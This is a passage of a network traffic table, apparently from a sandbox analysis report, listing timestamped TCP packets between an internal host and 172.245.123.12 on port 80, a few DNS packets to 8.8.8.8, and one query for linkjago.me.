                                                            Dec 2, 2024 07:29:27.386756897 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.386914015 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.386954069 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.389767885 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.389858007 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.389899015 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.392697096 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.392841101 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.392877102 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.395742893 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.395811081 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.395844936 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.398650885 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.398747921 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.398787975 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.401566982 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.401627064 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.401668072 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.404616117 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.404769897 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.404812098 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.407524109 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.407632113 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.407679081 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.410473108 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.410558939 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.410598993 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.413418055 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.413522005 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.413568974 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.416410923 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.416493893 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.416529894 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.419379950 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.419473886 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.419508934 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.422292948 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.422350883 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.422389030 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.470032930 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.470165968 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.470216990 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.471481085 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.471580982 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.471621037 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.474431992 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.474510908 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.474548101 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.477520943 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.477643967 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.477688074 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.480372906 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.480453014 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.480495930 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.483324051 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.483412027 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.483448029 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.486257076 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.486371994 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.486413956 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.489228964 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.489365101 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.489413023 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.492161036 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.551034927 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.551079035 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.551096916 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.551656961 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.551709890 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.551808119 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.554285049 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.554337025 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.554406881 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.556871891 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.556914091 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.557001114 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.559565067 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.559603930 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.559617043 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.562047958 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.562088013 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.562170982 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.564659119 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.564702034 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.564770937 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.567226887 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.567266941 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.567328930 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.569827080 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.569875002 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.569941044 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.572443008 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.572483063 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.572535038 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.575020075 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.575058937 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.575093985 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.577595949 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.577641964 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.577711105 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.580204010 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.580243111 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.580286026 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.582916021 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.582952976 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.582962990 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.585407019 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.585448980 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.585549116 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.588032007 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.588074923 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.588100910 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.590562105 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.590606928 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.590646029 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.593188047 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.593199968 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.593225002 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.595757008 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.595796108 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.595841885 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.597357035 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.597398043 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.597445011 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.598997116 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.599035025 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.599081993 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.600594044 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.600636005 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.600682974 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.602216959 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.602256060 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.602309942 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.603920937 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.603939056 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.603961945 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.605552912 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.605571985 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.605601072 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.607057095 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.607103109 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.607141972 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.609294891 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.609335899 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.609386921 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.671066046 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.671158075 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.671230078 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.671852112 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.671957970 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.671998024 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.673468113 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.673568964 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.673607111 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.675082922 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.675173998 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.675211906 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.676714897 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.676827908 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.676865101 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.678350925 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.678512096 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.678558111 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.679954052 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.680042982 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.680078983 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.681545973 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.681644917 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.681680918 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.683183908 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.683279991 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.683325052 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.684798956 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.684906960 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.684947968 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.686489105 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.686542034 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.686580896 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.688112020 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.688191891 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.688227892 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.689656973 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.689701080 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.689738989 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.691265106 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.691363096 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.691401005 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.692909956 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.693022966 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.693059921 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.694547892 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.694665909 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.694704056 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.696119070 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.696208000 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.696244001 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.697740078 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.697767973 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.697810888 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.699450970 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.699621916 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.699660063 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.700999022 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.701097012 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.701132059 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.702604055 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.702668905 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.702708006 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.704246044 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.704364061 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.704397917 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.705832958 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.705935001 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.705971956 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.707463980 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.707587004 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.707628012 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.709125042 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.709203959 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.709240913 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.710710049 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.752547026 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.752594948 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.752619028 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.753189087 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.753227949 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.753294945 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.754751921 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.754791975 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.754796028 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.756345034 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.756382942 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.756447077 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.757874966 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.757916927 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.757991076 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.759430885 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.759474039 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.759543896 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.760998964 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.761054039 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.761087894 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.762583971 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.762623072 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.762670040 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.764319897 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.764358997 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.764389038 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.765645027 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.765686989 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.765770912 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.767246962 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.767287970 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.767292023 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.768765926 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.768810034 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.768853903 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.770365953 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.770401955 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.770427942 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.771852970 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.771891117 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.772064924 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.773472071 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.773504972 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.773539066 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.775038958 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.775077105 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.775120020 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.776576996 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.776613951 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.776657104 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.778151989 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.778187990 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.778198004 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.779668093 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.779705048 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.779747963 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.781214952 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.781250954 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.781326056 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.782782078 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.782824039 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.782867908 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.784324884 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.784368038 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.784399986 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.785958052 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.785998106 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.786055088 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.787439108 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.787482977 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.787560940 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.789045095 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.789083958 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.789108992 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.790541887 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.790587902 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.790644884 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.792121887 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.792159081 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.792215109 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.793684959 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.793729067 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.793764114 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.795242071 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.795279980 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.795391083 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.796722889 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.796756983 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.796825886 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.798197031 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.798239946 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.798274994 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.799648046 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.799686909 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.799715042 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.801070929 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.801111937 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.801255941 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.802503109 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.802541018 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.862107038 CET4916980192.168.2.22172.245.123.12

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 2, 2024 07:28:48.359827042 CET5456253192.168.2.228.8.8.8
                                                            Dec 2, 2024 07:28:48.714484930 CET53545628.8.8.8192.168.2.22
                                                            Dec 2, 2024 07:28:53.176768064 CET5291753192.168.2.228.8.8.8
                                                            Dec 2, 2024 07:28:53.311192036 CET53529178.8.8.8192.168.2.22
                                                            Dec 2, 2024 07:28:53.312069893 CET5291753192.168.2.228.8.8.8
                                                            Dec 2, 2024 07:28:53.446382999 CET53529178.8.8.8192.168.2.22
                                                            Dec 2, 2024 07:28:53.458235025 CET5291753192.168.2.228.8.8.8
                                                            Dec 2, 2024 07:28:53.581152916 CET53529178.8.8.8192.168.2.22
                                                            Dec 2, 2024 07:28:53.581429958 CET5291753192.168.2.228.8.8.8
                                                            Dec 2, 2024 07:28:53.704273939 CET53529178.8.8.8192.168.2.22
                                                            Dec 2, 2024 07:29:08.610340118 CET6275153192.168.2.228.8.8.8
                                                            Dec 2, 2024 07:29:08.992193937 CET53627518.8.8.8192.168.2.22
                                                            Dec 2, 2024 07:29:09.021282911 CET5789353192.168.2.228.8.8.8
                                                            Dec 2, 2024 07:29:09.156227112 CET53578938.8.8.8192.168.2.22

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Dec 2, 2024 07:28:48.359827042 CET192.168.2.228.8.8.80xd210Standard query (0)linkjago.meA (IP address)IN (0x0001)false
